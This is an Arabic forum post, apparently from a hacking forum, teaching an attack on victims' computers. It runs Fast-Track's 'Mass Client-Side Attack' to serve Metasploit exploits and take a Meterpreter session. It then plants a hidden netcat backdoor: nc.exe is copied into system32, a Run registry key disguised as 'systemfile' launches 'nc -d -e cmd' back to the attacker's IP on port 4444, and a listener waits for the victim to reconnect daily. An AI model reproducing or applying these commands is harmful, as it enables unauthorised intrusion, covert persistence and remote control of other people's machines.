بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته .. وشلونكم ؟ ندخل في صلب الموضوع .. طبعا المكتوب واضح من عنوانه .. راح نستخدم اداة الفاست تراك في تطبيق هجوم الـ Client-side طيب يا عامر وش يعني ؟ باختصار شديد .. هو تجميع اكبر عدد ممكن من الاكسبلويتات الموجودة بالميتاسبلويت في وقت واحد و في ايفريم واحد على سيرفر محلي .. طيب ندخل على التيرمنال .. بوضعية الجذر و نكتب الامر لدخول مجلد الفاست تراك كود: cd/pentest/exploits/fasttrack لو تستعرض الملفات الموجودة بالمجلد .. بتلقى سكربت الفاست تراك بلغة البايثون .. طيب نشغله بالامر .. كود: ./fast-track.py -i -i تعني تشغيل السكربت داخل التيرمنال .. الان بيطلع لنا عدة خيارات ممكن تنفذها .. و كل مهمة لها رقم محدد هجومنا المطلوب اسمه Mass Client-Side Attack و رقمه 4 .. يعني نحدده بالرقم 4 من ثم بيطلب منك السكربت وضع الاي بي اللي راح يكون سيرفر للتنصت عليه ( الاي بي تبعك طبعا ) من ثم بيعرض لك 4 بايلودات تختار منها اللي تبي .. يفضل Meterpreter لان راح نستخدمه بعد شوي لسهولته .. ثم بيسالك اذا تبي تعمل ارب بويزنينج اطلب منه لا .. الان الاداة تقوم بعملها و تجميع الثغرات الممكن و بدأ السيرفر .. ننتظر الى ان تنتهي .. بكملة Server started بامكانك عمل سبوفينج بالسيرفر .. ( شارحها في مواضيع سابقة بالتفصيل ) عموما .. الان نفرض لقطنا الضحية بيخبرك ان فيه جلسة جديدة مفتوحة .. ندخل لها بالامر كود: sessions -i 1 1 يعني رقم الجلسة .. الان امامك الضحية .. و يمكنك تتحكم فيه تحكم كامل ================================================== ========= دور المفاجئة :- المفاجئة يا طويل العمر هي استخدام النت كات كـ Backdoor يتم حقنه بالرجيستري ليتنصت على الاي بي تبعنا داخل مجلد بدء التشغيل .. اولا: نرفع النت كات الى على هالمسار داخل جهاز الضحية .. كود: upload /tmp/nc***** C:\\windows\\system32\\nc***** الان ندخل على موجه الاوامر تبع الضحية .. كود: execute -c -H -f cmd***** -i وش السواة الحين ؟ امر بسيط لحقن مفتاح ريجيستري بهالقيمة .. nc -d -e cmd***** 192.168.1.3 4444 مع التغيير للاي بي تبعك .. و المقصود بهالامر تنفيذ التنصت خلال بداية التشغيل بوضعية موجه الاوامر .. و هذا هو الامر كامل كود: reg add hklm\software\microsoft\windows\currentversion\run systemfile /t reg_sz /d "nc -d -e cmd***** 192.168.1.3 4444"/ reg add : واضح .. امر بدائي لاضافة اي مفتاح hklm : و تعني مجلد HKEY_LOCAL_MACHINE /v : و تعني اسم المفتاح و انا هنا موهت بالاسم systemfile /t : و تعني نوع المفتاح و في الاغلب يكون reg_sz /d : و هنا تتلخص الزبدة تبعنا .. و هي البيانات المطلوبة و هذي بيناتنا n c -d -e cmd***** 192.168.1.3 4444 الان و بعد زرع المفتاح .. نروح للتيرمنال و ونتنصت على البورت 4444 .. كود: nc -vlp 4444 و الضحية راح يشبك معك يوميا .. noureno للمراسلة على الفيس بوك : [email protected]
قوانين المنتدى